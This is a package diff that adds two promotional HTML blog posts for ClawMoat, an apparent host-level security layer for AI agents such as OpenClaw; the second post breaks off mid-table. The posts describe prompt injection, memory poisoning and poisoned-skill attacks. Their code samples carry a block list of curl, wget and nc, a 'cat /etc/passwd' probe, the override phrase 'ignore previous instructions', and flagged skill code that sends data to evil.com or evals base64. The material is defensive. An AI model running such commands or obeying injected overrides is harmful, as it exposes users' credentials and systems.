clawmoat 0.7.0 → 1.0.0

package/docs/blog/microsoft-openclaw-workstation-security.html

@@ -0,0 +1,235 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Microsoft Says Don't Run OpenClaw on Your Workstation. Here's How to Do It Safely. | ClawMoat Blog</title>
+<meta name="description" content="Microsoft's security team says OpenClaw is 'untrusted code execution with persistent credentials.' They're right — and here's how to run it safely with host-level security.">
+<meta name="keywords" content="OpenClaw security, Microsoft OpenClaw warning, OpenClaw workstation security, AI agent security, ClawMoat host guardian, OpenClaw enterprise">
+<link rel="canonical" href="https://clawmoat.com/blog/microsoft-openclaw-workstation-security.html">
+<meta property="og:title" content="Microsoft Says Don't Run OpenClaw on Your Workstation. Here's How to Do It Safely.">
+<meta property="og:description" content="Microsoft's security blog says OpenClaw is 'untrusted code execution.' They recommend VMs. We built a better answer: host-level security that makes your workstation safe.">
+<meta property="og:url" content="https://clawmoat.com/blog/microsoft-openclaw-workstation-security.html">
+<meta property="og:type" content="article">
+<link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>🏰</text></svg>">
+<style>
+*{margin:0;padding:0;box-sizing:border-box}
+:root{--navy:#0F172A;--navy-light:#1E293B;--navy-mid:#334155;--blue:#3B82F6;--emerald:#10B981;--white:#F8FAFC;--gray:#94A3B8;--red:#EF4444}
+body{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif;background:var(--navy);color:var(--white);line-height:1.8}
+a{color:var(--blue)}
+.container{max-width:740px;margin:0 auto;padding:0 24px}
+nav{background:rgba(15,23,42,.95);backdrop-filter:blur(12px);border-bottom:1px solid rgba(59,130,246,.15);padding:16px 0;position:fixed;top:0;left:0;right:0;z-index:100}
+nav .container{display:flex;align-items:center;justify-content:space-between}
+.logo{font-size:1.1rem;font-weight:700;color:var(--white);text-decoration:none}
+.logo span{color:var(--emerald)}
+nav a{color:var(--gray);font-size:.85rem;text-decoration:none}
+nav a:hover{color:var(--white)}
+article{padding:120px 0 80px}
+.meta{color:var(--gray);font-size:.85rem;margin-bottom:32px}
+h1{font-size:clamp(1.8rem,4vw,2.6rem);font-weight:800;line-height:1.2;margin-bottom:16px;letter-spacing:-.02em}
+h2{font-size:1.4rem;font-weight:700;margin:48px 0 16px;letter-spacing:-.01em}
+h3{font-size:1.1rem;font-weight:600;margin:32px 0 12px}
+p{color:var(--gray);margin-bottom:20px;font-size:1rem}
+blockquote{border-left:3px solid var(--blue);padding:16px 24px;margin:24px 0;background:var(--navy-light);border-radius:0 8px 8px 0}
+blockquote p{color:var(--white);margin:0;font-style:italic}
+blockquote cite{display:block;color:var(--gray);font-size:.85rem;margin-top:8px;font-style:normal}
+code{background:var(--navy-light);padding:2px 6px;border-radius:4px;font-size:.9rem;color:var(--emerald)}
+pre{background:#0a0e17;border:1px solid var(--navy-mid);border-radius:8px;padding:20px;overflow-x:auto;margin:24px 0;font-size:.85rem;line-height:1.6}
+pre code{background:none;padding:0}
+ul,ol{color:var(--gray);margin:0 0 20px 24px}
+li{margin-bottom:8px}
+.cta{background:linear-gradient(135deg,rgba(16,185,129,.1),rgba(59,130,246,.1));border:1px solid rgba(16,185,129,.2);border-radius:12px;padding:32px;text-align:center;margin:48px 0}
+.cta h3{margin:0 0 12px;color:var(--white)}
+.cta p{margin:0 0 20px}
+.cta a{display:inline-block;background:var(--emerald);color:#fff;padding:12px 28px;border-radius:8px;font-weight:600;text-decoration:none}
+.cta a:hover{opacity:.9}
+.highlight-box{background:var(--navy-light);border:1px solid rgba(239,68,68,.2);border-radius:8px;padding:20px;margin:24px 0}
+.highlight-box h4{color:var(--red);font-size:.9rem;margin-bottom:8px}
+.highlight-box p{margin:0;font-size:.9rem}
+</style>
+</head>
+<body>
+<nav>
+<div class="container">
+  <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
+  <button class="menu-toggle" onclick="document.querySelector('.nav-links').classList.toggle('open')" aria-label="Menu">☰</button>
+  <div class="nav-links">
+    <a href="/">Security</a>
+    <a href="/services/">AI Agents</a>
+    <a href="/blog/">Blog</a>
+    <a href="https://github.com/darfaz/clawmoat">GitHub ↗</a>
+  </div>
+</div>
+</nav>
+
+<article>
+<div class="container">
+<div class="meta">February 26, 2026 · 8 min read · By the ClawMoat Team</div>
+<h1>Microsoft Says Don't Run OpenClaw on Your Workstation. Here's How to Do It Safely.</h1>
+
+<p style="font-size:1.15rem;color:var(--white);line-height:1.7">On February 19, Microsoft's security team published a blog post that should make every OpenClaw user pause: <a href="https://www.microsoft.com/en-us/security/blog/2026/02/19/running-openclaw-safely-identity-isolation-runtime-risk/">"Running OpenClaw safely: identity, isolation, and runtime risk."</a> Their recommendation? <strong>Don't run it on your workstation at all.</strong></p>
+
+<blockquote>
+<p>"OpenClaw should be treated as untrusted code execution with persistent credentials. It is not appropriate to run on a standard personal or enterprise workstation."</p>
+<cite>— Microsoft Security Blog, February 19, 2026</cite>
+</blockquote>
+
+<p>They're not wrong. But their solution — spinning up dedicated VMs for every agent — isn't practical for most teams. We built a better answer.</p>
+
+<h2>What Microsoft Found</h2>
+
+<p>Microsoft identified three risks that materialize "quickly" in unguarded OpenClaw deployments:</p>
+
+<ol>
+<li><strong>Credential exposure.</strong> Your agent can read SSH keys, AWS tokens, browser cookies, and API secrets — and exfiltrate them through a single curl command.</li>
+<li><strong>Memory poisoning.</strong> An attacker can modify your agent's persistent state, causing it to follow malicious instructions across sessions — a slow, invisible hijack.</li>
+<li><strong>Host compromise.</strong> The agent can be induced to download and execute malicious code, turning your workstation into an attacker's foothold.</li>
+</ol>
+
+<p>They also mapped a "poisoned skill" attack chain: a malicious skill published to ClawHub gets installed, runs with your credentials, and establishes persistent control.</p>
+
+<div class="highlight-box">
+<h4>⚠️ The Numbers Are Stark</h4>
+<p>135K+ exposed OpenClaw instances (SecurityScorecard). 341+ malicious skills found on ClawHub (Snyk — 13.4% of skills have critical issues). CVE-2026-25253 scored 8.8. Runlayer's security team compromised an OpenClaw agent in 40 messages, one hour.</p>
+</div>
+
+<h2>Microsoft's Recommendation: Isolate Everything</h2>
+
+<p>Microsoft recommends deploying OpenClaw <em>only</em> in:</p>
+<ul>
+<li>A dedicated virtual machine or separate physical system</li>
+<li>With dedicated, non-privileged credentials</li>
+<li>With access only to non-sensitive data</li>
+<li>With continuous monitoring and a rebuild plan</li>
+</ul>
+
+<p>This is sound security advice. It's also wildly impractical.</p>
+
+<p>Most people running OpenClaw are developers on their laptops. Small businesses running it on a Mac Mini. Solopreneurs with one machine. They're not going to spin up a VM, create a separate user account, configure credential isolation, set up monitoring, and maintain a rebuild plan. They're going to keep running it exactly as they are — with full access to everything on their machine.</p>
+
+<h2>The Real Problem: There's Nothing Between the Agent and Your File System</h2>
+
+<p>Here's what the current OpenClaw security model looks like:</p>
+
+<pre><code>Your Agent → Your Machine (everything accessible)
+</code></pre>
+
+<p>There is no permission system. No access control layer. No audit trail. No forbidden zones. The agent has the same access as the user who installed it — which usually means <em>everything</em>.</p>
+
+<p>This is the gap that other tools don't fill:</p>
+<ul>
+<li><strong>LlamaFirewall</strong> (Meta) — protects the model from prompt injection. Doesn't touch your file system.</li>
+<li><strong>NeMo Guardrails</strong> (NVIDIA) — conversation-level guardrails. No host awareness.</li>
+<li><strong>Runlayer</strong> — enterprise SaaS, MDM-based. Great for large orgs. Not open source, not for individuals or small teams.</li>
+<li><strong>KiloClaw</strong> (Kilo.ai) — managed hosting. Solves the VM problem but requires moving to their cloud.</li>
+</ul>
+
+<p>None of them protect the host. None of them put a security layer <em>between the agent and your SSH keys</em>.</p>
+
+<h2>What ClawMoat Does Differently</h2>
+
+<p>ClawMoat is the only open-source tool designed specifically for host-level agent security. Instead of isolating the agent in a VM, we put guardrails directly on the machine:</p>
+
+<pre><code>Your Agent → ClawMoat (validate every action) → Your Machine (restricted access)
+</code></pre>
+
+<h3>Four Permission Tiers</h3>
+<p>Like Microsoft recommends "non-privileged credentials," ClawMoat enforces this through permission tiers — but without requiring a separate VM:</p>
+<ul>
+<li><strong>Observer</strong> — read-only access. Perfect for evaluation.</li>
+<li><strong>Worker</strong> — safe commands (git, npm, basic file I/O). No destructive operations.</li>
+<li><strong>Standard</strong> — most operations allowed. Forbidden zones enforced.</li>
+<li><strong>Full</strong> — unrestricted. Forbidden zones still active. Full audit trail.</li>
+</ul>
+
+<h3>Forbidden Zones (Even at Full Tier)</h3>
+<p>Microsoft says "access only non-sensitive data." We enforce this with forbidden zones that block access to sensitive directories regardless of tier:</p>
+<pre><code>~/.ssh/          # SSH keys
+~/.aws/          # AWS credentials  
+~/.gnupg/        # GPG keys
+~/.kube/         # Kubernetes configs
+~/Library/Cookies/  # Browser sessions
+~/.npmrc         # Package tokens
+# ... 20+ patterns total
+</code></pre>
+
+<h3>Continuous Monitoring (Built In)</h3>
+<p>Microsoft recommends "continuous monitoring." ClawMoat provides:</p>
+<ul>
+<li>Full audit trail of every file access, shell command, and network request</li>
+<li>Credential file monitoring (watches for unauthorized access attempts)</li>
+<li>Network egress logging with domain allow/blocklists</li>
+<li>Real-time alerts via webhook, Slack, email, or console</li>
+<li>Skill integrity checking (hash verification + suspicious pattern detection)</li>
+</ul>
+
+<h3>One Command to Install</h3>
+<pre><code>npm install -g clawmoat</code></pre>
+<p>Zero dependencies. Sub-millisecond validation. MIT licensed. No VM required.</p>
+
+<h2>How This Maps to Microsoft's Recommendations</h2>
+
+<table style="width:100%;border-collapse:collapse;margin:24px 0;font-size:.9rem">
+<tr style="border-bottom:1px solid var(--navy-mid)">
+<th style="text-align:left;padding:12px;color:var(--gray)">Microsoft Recommends</th>
+<th style="text-align:left;padding:12px;color:var(--gray)">ClawMoat Equivalent</th>
+</tr>
+<tr style="border-bottom:1px solid rgba(255,255,255,.05)">
+<td style="padding:12px;color:var(--gray)">Dedicated VM or physical system</td>
+<td style="padding:12px;color:var(--emerald)">Permission tiers + forbidden zones (no VM needed)</td>
+</tr>
+<tr style="border-bottom:1px solid rgba(255,255,255,.05)">
+<td style="padding:12px;color:var(--gray)">Non-privileged credentials</td>
+<td style="padding:12px;color:var(--emerald)">Worker tier blocks credential access by default</td>
+</tr>
+<tr style="border-bottom:1px solid rgba(255,255,255,.05)">
+<td style="padding:12px;color:var(--gray)">Access only non-sensitive data</td>
+<td style="padding:12px;color:var(--emerald)">20+ forbidden zone patterns auto-enforced</td>
+</tr>
+<tr style="border-bottom:1px solid rgba(255,255,255,.05)">
+<td style="padding:12px;color:var(--gray)">Continuous monitoring</td>
+<td style="padding:12px;color:var(--emerald)">Full audit trail + real-time alerts</td>
+</tr>
+<tr>
+<td style="padding:12px;color:var(--gray)">Rebuild plan</td>
+<td style="padding:12px;color:var(--emerald)">Incident forensics from audit logs in 30 seconds</td>
+</tr>
+</table>
+
+<h2>The Growing Ecosystem</h2>
+
+<p>We're not the only ones recognizing this gap. In the past week:</p>
+<ul>
+<li><strong>Runlayer</strong> launched "OpenClaw for Enterprise" with ToolGuard real-time blocking</li>
+<li><strong>Crittora</strong> announced cryptographic policy enforcement for OpenClaw</li>
+<li><strong>KiloClaw</strong> launched managed OpenClaw hosting on Fly.io</li>
+<li><strong>Forbes</strong> called the OpenAI acquisition "a surprising win for small business ROI"</li>
+<li>OpenClaw has <strong>161K+ GitHub stars</strong> and is now backed by the OpenClaw Foundation</li>
+</ul>
+
+<p>The market has spoken: AI agents are here to stay. The question isn't whether to use them — it's how to use them safely.</p>
+
+<div class="cta">
+<h3>Stop choosing between productivity and security.</h3>
+<p>Install ClawMoat in 60 seconds. Keep running OpenClaw on your machine — safely.</p>
+<a href="https://github.com/darfaz/clawmoat">⭐ Star on GitHub</a>
+</div>
+
+<h2>What's Next</h2>
+
+<p>Microsoft's blog post is a wake-up call. But the answer isn't to stop using agents — it's to secure them properly. If you're running OpenClaw today:</p>
+
+<ol>
+<li><strong>Install ClawMoat</strong> — <code>npm install -g clawmoat</code></li>
+<li><strong>Start at Worker tier</strong> — safe defaults, no credential access</li>
+<li><strong>Check your audit logs</strong> — see exactly what your agent has been accessing</li>
+<li><strong>Join the conversation</strong> — <a href="https://github.com/darfaz/clawmoat/issues">GitHub Issues</a> | <a href="https://discord.com/invite/clawd">Discord</a></li>
+</ol>
+
+<p>For businesses running agent fleets, see our <a href="/business/">enterprise security setup</a> — installed on your machines in under an hour.</p>
+
+<p style="color:var(--gray);font-size:.85rem;margin-top:48px;padding-top:24px;border-top:1px solid rgba(255,255,255,.06)">ClawMoat is open source (MIT). 142 tests passing. Zero dependencies. <a href="https://github.com/darfaz/clawmoat">View on GitHub →</a></p>
+</div>
+</article>
+</body>
+</html>

package/docs/blog/nist-ai-agent-standards-clawmoat.html

@@ -0,0 +1,377 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<link rel="icon" type="image/png" href="/favicon.png">
+<link rel="apple-touch-icon" href="/apple-touch-icon.png">
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>NIST Is Standardizing AI Agent Security — ClawMoat Already Ships It</title>
+<meta name="description" content="NIST launched the AI Agent Standards Initiative on Feb 20, 2026. Every security concern they raised — least privilege, tool validation, prompt injection, supply chain — ClawMoat already ships as open-source middleware.">
+<meta property="og:title" content="NIST Is Standardizing AI Agent Security — ClawMoat Already Ships It">
+<meta property="og:description" content="Every NIST recommendation maps to a ClawMoat module you can npm install today.">
+<meta property="og:type" content="article">
+<meta property="og:url" content="https://clawmoat.com/blog/nist-ai-agent-standards-clawmoat.html">
+<link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>🏰</text></svg>">
+<style>
+*{margin:0;padding:0;box-sizing:border-box}
+:root{--navy:#0F172A;--navy-light:#1E293B;--navy-mid:#334155;--blue:#3B82F6;--emerald:#10B981;--white:#F8FAFC;--gray:#94A3B8;--red:#EF4444;--amber:#F59E0B}
+body{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif;background:var(--navy);color:var(--white);line-height:1.7}
+a{color:var(--blue);text-decoration:none}
+a:hover{text-decoration:underline}
+.container{max-width:760px;margin:0 auto;padding:0 24px}
+
+nav{position:fixed;top:0;left:0;right:0;z-index:100;background:rgba(15,23,42,.95);backdrop-filter:blur(12px);border-bottom:1px solid rgba(59,130,246,.15);padding:16px 0}
+nav .inner{max-width:760px;margin:0 auto;padding:0 24px;display:flex;align-items:center;justify-content:space-between}
+.logo{font-size:1.25rem;font-weight:700;color:var(--white)}
+.logo span{color:var(--emerald)}
+.nav-links{display:flex;gap:24px}
+.nav-links a{color:var(--gray);font-size:.9rem}
+.nav-links a:hover{color:var(--white);text-decoration:none}
+
+article{padding:120px 0 80px}
+.meta{color:var(--gray);font-size:.9rem;margin-bottom:32px}
+article h1{font-size:clamp(1.8rem,4vw,2.4rem);font-weight:800;line-height:1.2;margin-bottom:12px;letter-spacing:-.02em}
+article h2{font-size:1.4rem;font-weight:700;margin:48px 0 16px;color:var(--white)}
+article h3{font-size:1.15rem;font-weight:700;margin:32px 0 12px;color:var(--white)}
+article p{color:var(--gray);font-size:1rem;margin-bottom:16px}
+article strong{color:var(--white)}
+article em{color:var(--gray)}
+article ul,article ol{color:var(--gray);margin:0 0 16px 24px}
+article li{margin-bottom:8px}
+article hr{border:none;border-top:1px solid var(--navy-mid);margin:48px 0}
+
+pre{background:#0a0e17;border:1px solid var(--navy-mid);border-radius:10px;padding:20px;overflow-x:auto;margin:16px 0 24px;font-size:.85rem;line-height:1.7}
+code{font-family:'SF Mono',Consolas,monospace;font-size:.9em}
+pre code{color:var(--gray)}
+p code{background:var(--navy-light);padding:2px 6px;border-radius:4px;font-size:.85em;color:var(--emerald)}
+
+.nist-box{background:var(--navy-light);border-left:3px solid var(--amber);border-radius:0 10px 10px 0;padding:16px 20px;margin:16px 0}
+.nist-box .label{color:var(--amber);font-weight:700;font-size:.85rem;text-transform:uppercase;letter-spacing:.05em;margin-bottom:6px}
+.nist-box p{margin-bottom:0;font-size:.95rem}
+
+.ships-box{background:rgba(16,185,129,.06);border-left:3px solid var(--emerald);border-radius:0 10px 10px 0;padding:16px 20px;margin:16px 0}
+.ships-box .label{color:var(--emerald);font-weight:700;font-size:.85rem;text-transform:uppercase;letter-spacing:.05em;margin-bottom:6px}
+.ships-box p{margin-bottom:0;font-size:.95rem}
+
+table{width:100%;border-collapse:collapse;margin:16px 0 24px;font-size:.9rem}
+th{text-align:left;padding:10px 12px;border-bottom:2px solid var(--navy-mid);color:var(--white);font-weight:600}
+td{padding:8px 12px;border-bottom:1px solid var(--navy-mid);color:var(--gray)}
+tr:hover td{background:rgba(59,130,246,.04)}
+
+.tags{display:flex;gap:8px;margin-top:32px;flex-wrap:wrap}
+.tag{background:rgba(59,130,246,.12);color:var(--blue);padding:4px 12px;border-radius:20px;font-size:.8rem}
+
+.back{display:inline-flex;align-items:center;gap:6px;color:var(--gray);font-size:.9rem;margin-bottom:24px}
+.back:hover{color:var(--white);text-decoration:none}
+
+.cta{background:linear-gradient(135deg,rgba(59,130,246,.15),rgba(16,185,129,.15));border:1px solid rgba(59,130,246,.3);border-radius:12px;padding:32px;margin:32px 0;text-align:center}
+.cta h3{margin-top:0;font-size:1.3rem}
+.cta p{font-size:.95rem}
+.cta code{font-size:1rem}
+
+.timeline{position:relative;padding-left:24px;margin:16px 0 24px}
+.timeline::before{content:'';position:absolute;left:6px;top:4px;bottom:4px;width:2px;background:var(--navy-mid)}
+.timeline .event{position:relative;margin-bottom:16px}
+.timeline .event::before{content:'';position:absolute;left:-22px;top:6px;width:10px;height:10px;border-radius:50%;background:var(--amber)}
+.timeline .event strong{color:var(--white)}
+
+footer{border-top:1px solid rgba(255,255,255,.06);padding:32px 0;color:var(--gray);font-size:.85rem;text-align:center}
+</style>
+</head>
+<body>
+
+<nav>
+<div class="container">
+  <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
+  <button class="menu-toggle" onclick="document.querySelector('.nav-links').classList.toggle('open')" aria-label="Menu">☰</button>
+  <div class="nav-links">
+    <a href="/">Security</a>
+    <a href="/services/">AI Agents</a>
+    <a href="/blog/">Blog</a>
+    <a href="https://github.com/darfaz/clawmoat">GitHub ↗</a>
+  </div>
+</div>
+</nav>
+
+<div class="container">
+<article>
+<a href="/blog/" class="back">← Back to Blog</a>
+<h1>NIST Is Standardizing AI Agent Security — ClawMoat Already Ships It</h1>
+<div class="meta">February 28, 2026 · 10 min read</div>
+
+<p>On February 20, 2026, NIST's Center for AI Standards and Innovation (CAISI) <a href="https://www.nist.gov/news-events/news/2026/02/announcing-ai-agent-standards-initiative-interoperable-and-secure">launched the AI Agent Standards Initiative</a> — the U.S. government's first formal effort to standardize security for autonomous AI agents. The initiative includes an <a href="https://www.nist.gov/news-events/news/2026/01/caisi-issues-request-information-about-securing-ai-agent-systems">RFI on AI Agent Security</a> (docket NIST-2025-0035, comments due March 9), a <a href="https://www.nccoe.nist.gov/projects/software-and-ai-agent-identity-and-authorization">draft concept paper on Agent Identity and Authorization</a> from NCCoE (due April 2), and upcoming listening sessions for healthcare, finance, and education.</p>
+
+<p>This is a big deal. The federal government is saying: <strong>AI agents that take autonomous actions present unique security challenges</strong>, and we need standards for them.</p>
+
+<p>We agree. That's why we've been shipping those standards as open-source code since January 2026.</p>
+
+<p>Here's every security concern NIST raised — and the ClawMoat module that already addresses it.</p>
+
+<hr>
+
+<h2>1. Constraining Agent Access in Deployment Environments</h2>
+
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p>The RFI asks about <em>"interventions in deployment environments to address security risks affecting AI agent systems, including methods to <strong>constrain and monitor the extent of agent access</strong> in the deployment environment."</em><br>— <a href="https://www.nist.gov/news-events/news/2026/01/caisi-issues-request-information-about-securing-ai-agent-systems">NIST CAISI RFI, January 2026</a></p>
+</div>
+
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Host Guardian</strong> — four permission tiers that constrain what an AI agent can do on the host system, from full lockdown to controlled access.</p>
+</div>
+
+<pre><code>import { createHostGuardian } from 'clawmoat';
+
+const guardian = createHostGuardian({
+  tier: 'restricted',  // lockdown | restricted | standard | trusted
+  rules: {
+    filesystem: { writable: ['/tmp', './workspace'], blocked: ['~/.ssh', '~/.aws'] },
+    network:    { allowedHosts: ['api.openai.com', 'github.com'] },
+    processes:  { blocked: ['curl', 'wget', 'nc'] },
+    env:        { redact: ['AWS_SECRET_ACCESS_KEY', 'DATABASE_URL'] }
+  }
+});
+
+// Every agent action passes through the guardian
+const result = await guardian.evaluate({
+  action: 'exec',
+  command: 'cat /etc/passwd'
+});
+// → { allowed: false, reason: 'Path /etc/passwd outside permitted directories' }</code></pre>
+
+<p>Four tiers from <code>lockdown</code> (zero external access) to <code>trusted</code> (full access with audit logging). Most deployments run <code>restricted</code> — the agent can read docs and call APIs, but can't touch SSH keys, spawn reverse shells, or exfiltrate environment variables.</p>
+
+<h2>2. Tool Validation and Authorization</h2>
+
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p>The NCCoE concept paper focuses on how to <em>"identify, manage, and authorize access and actions taken by software agents, including AI agents"</em> — specifically, controlling what tools agents can invoke and what those tools can do.<br>— <a href="https://www.nccoe.nist.gov/projects/software-and-ai-agent-identity-and-authorization">NCCoE Draft Concept Paper, February 2026</a></p>
+</div>
+
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>McpFirewall</strong> — intercepts every MCP tool call with allowlisting, read-only enforcement, argument validation, and rate limiting.</p>
+</div>
+
+<pre><code>import { McpFirewall } from 'clawmoat';
+
+const firewall = new McpFirewall({
+  tools: {
+    'database_query':  { mode: 'read-only', blocked: ['DROP', 'DELETE', 'TRUNCATE'] },
+    'file_write':      { allowed: false },
+    'web_search':      { rateLimit: { max: 10, windowMs: 60000 } },
+    'send_email':      { requireApproval: true }
+  },
+  defaultPolicy: 'deny'  // Unknown tools are blocked by default
+});
+
+// Wraps any MCP server
+const safeMcp = firewall.wrap(mcpServer);
+
+// Agent tries: DELETE FROM users WHERE 1=1
+// → Blocked: write operation matches pattern "DELETE" on read-only tool</code></pre>
+
+<p>McpFirewall recognizes <strong>29 write-operation patterns</strong> across SQL, filesystem, and API calls. It can enforce read-only mode on database tools while allowing search tools — with per-tool rate limits to prevent data exfiltration through volume.</p>
+
+<h2>3. Adversarial Data and Prompt Injection</h2>
+
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p><em>"This includes risks from models interacting with adversarial data (such as in <strong>indirect prompt injection</strong>), risks from the use of insecure models (such as models that have been subject to data poisoning)."</em><br>— <a href="https://www.nist.gov/news-events/news/2026/01/caisi-issues-request-information-about-securing-ai-agent-systems">NIST CAISI RFI, January 2026</a></p>
+</div>
+
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Prompt Injection Scanner</strong> — pattern-based detection of injection attempts in tool outputs, user inputs, and retrieved documents before they reach the model.</p>
+</div>
+
+<pre><code>import { PromptInjectionScanner } from 'clawmoat';
+
+const scanner = new PromptInjectionScanner();
+
+// Scan tool output before feeding it back to the agent
+const toolOutput = await mcpTool.call('web_scrape', { url: untrustedUrl });
+const scan = scanner.scan(toolOutput);
+
+if (scan.injectionDetected) {
+  console.log(scan.threats);
+  // → [{ type: 'instruction_override', pattern: 'ignore previous instructions',
+  //       severity: 'critical', location: 'line 47' }]
+  // Quarantine or sanitize before passing to model
+}</code></pre>
+
+<p>The scanner detects role hijacking, instruction overrides, data exfiltration attempts, and encoding-based evasion. It runs in &lt;2ms per scan — fast enough to sit in the hot path of every tool call without latency impact.</p>
+
+<h2>4. Data Protection and Sensitive Information</h2>
+
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p>The Initiative highlights sector-specific concerns in <strong>healthcare, finance, and education</strong>, with listening sessions planned to identify barriers to secure AI adoption in these regulated industries.<br>— <a href="https://www.nist.gov/caisi/ai-agent-standards-initiative">NIST AI Agent Standards Initiative, February 2026</a></p>
+</div>
+
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Secret Scanner</strong> and <strong>FinanceGuard</strong> — field-level redaction of credentials, PII, and financial data before it leaves the agent's context.</p>
+</div>
+
+<pre><code>import { SecretScanner, FinanceGuard } from 'clawmoat';
+
+// Secret Scanner: catches API keys, tokens, passwords in any text
+const secrets = new SecretScanner();
+const result = secrets.scan(agentOutput);
+// → Detects: AWS keys, GitHub tokens, JWTs, database URLs, SSNs, credit cards
+
+// FinanceGuard: specialized for financial data in agent workflows
+const finance = new FinanceGuard({
+  redact: ['account_number', 'routing_number', 'ssn', 'credit_card'],
+  audit: true,  // Log every redaction for SOX/PCI compliance
+  allowFields: ['transaction_date', 'amount', 'category']
+});
+
+const safeOutput = finance.process(agentResponse);
+// "Transfer $5,000 from account 7834-2291-0054 routing 021000021"
+// → "Transfer $5,000 from account [REDACTED] routing [REDACTED]"</code></pre>
+
+<p>FinanceGuard generates <strong>SOX and PCI-DSS compliance reports</strong> automatically — every redaction is logged with timestamp, field type, and context. When NIST's listening sessions identify requirements for finance-sector AI agents, this is the kind of infrastructure they'll recommend.</p>
+
+<h2>5. Supply Chain Security</h2>
+
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p><em>"Risks from the use of insecure models (such as models that have been subject to <strong>data poisoning</strong>)"</em> — and more broadly, the NIST AI RMF (AI 600-1) GenAI Profile identifies supply chain integrity as a core risk management action area, with <strong>200+ suggested actions</strong>.<br>— <a href="https://airc.nist.gov/technical-reports/">NIST AI 600-1 GenAI Profile</a></p>
+</div>
+
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Skill Integrity Checker</strong> — hash verification and behavioral analysis of AI agent skills/plugins before installation.</p>
+</div>
+
+<pre><code>import { SkillIntegrityChecker } from 'clawmoat';
+
+const checker = new SkillIntegrityChecker();
+
+const audit = await checker.scan('./skills/untrusted-plugin/');
+// Checks for 14 suspicious patterns:
+//   - Obfuscated code (base64 decode, eval, Function constructor)
+//   - Network exfiltration (fetch to unknown hosts, DNS tunneling)
+//   - File system access outside workspace
+//   - Environment variable harvesting
+//   - Cryptocurrency mining signatures
+//   - Hidden process spawning
+//   - Permission escalation attempts
+
+console.log(audit);
+// → { safe: false, threats: 3, details: [
+//      { pattern: 'env_harvesting', file: 'index.js', line: 42,
+//        code: 'Object.entries(process.env).forEach(...)' },
+//      { pattern: 'network_exfil', file: 'utils.js', line: 17,
+//        code: 'fetch("https://evil.com/collect", { body: data })' },
+//      { pattern: 'obfuscated_code', file: 'helper.js', line: 3,
+//        code: 'eval(Buffer.from("...", "base64").toString())' }
+//    ]}</code></pre>
+
+<p>We've already used this to audit the OpenClaw skill ecosystem and found <a href="/blog/386-malicious-skills.html">386 malicious skills</a> with patterns ranging from credential theft to cryptocurrency mining. The scanner catches what <code>npm audit</code> misses because it analyzes <em>behavior</em>, not just known CVEs.</p>
+
+<h2>6. Monitoring and Audit Trails</h2>
+
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p>The Initiative's three strategic pillars include <em>"advancing research in areas of AI agent <strong>security and identity</strong> to enable new use cases and to promote <strong>trusted adoption</strong> across sectors."</em> The RFI specifically asks about <em>"methods for <strong>measuring the security</strong> of AI agent systems."</em><br>— <a href="https://www.nist.gov/caisi/ai-agent-standards-initiative">NIST AI Agent Standards Initiative, February 2026</a></p>
+</div>
+
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Network Egress Logger</strong> and full audit trail with compliance report generation.</p>
+</div>
+
+<pre><code>import { NetworkEgressLogger, ComplianceReporter } from 'clawmoat';
+
+// Log every outbound connection the agent makes
+const egress = new NetworkEgressLogger({
+  logFile: './audit/network-egress.jsonl',
+  alertOn: { unknownHosts: true, highVolume: true, unusualPorts: true }
+});
+
+// Generate compliance reports
+const reporter = new ComplianceReporter({
+  framework: 'SOX',  // or 'PCI-DSS', 'HIPAA'
+  period: 'monthly',
+  include: ['tool_calls', 'data_access', 'redactions', 'blocked_actions']
+});
+
+const report = await reporter.generate();
+// → Structured report: 4,291 tool calls, 847 redactions,
+//    23 blocked actions, 0 data exfiltration attempts
+//    Exportable as PDF, JSON, or CSV</code></pre>
+
+<p>Every ClawMoat module writes to a unified audit log. When a regulator asks "what did your AI agent do with customer data last Tuesday?" — you have the answer in milliseconds, not weeks.</p>
+
+<hr>
+
+<h2>The Full Mapping</h2>
+
+<table>
+<thead>
+<tr><th>NIST Concern</th><th>Document</th><th>ClawMoat Module</th><th>Status</th></tr>
+</thead>
+<tbody>
+<tr><td>Constrain agent access</td><td>CAISI RFI</td><td>Host Guardian (4 tiers)</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Tool authorization</td><td>NCCoE Concept Paper</td><td>McpFirewall</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Prompt injection</td><td>CAISI RFI</td><td>Prompt Injection Scanner</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Data protection (PII/financial)</td><td>Listening Sessions</td><td>Secret Scanner + FinanceGuard</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Supply chain integrity</td><td>AI 600-1 / RFI</td><td>Skill Integrity Checker</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Security measurement</td><td>CAISI RFI</td><td>Network Egress Logger + Audit</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
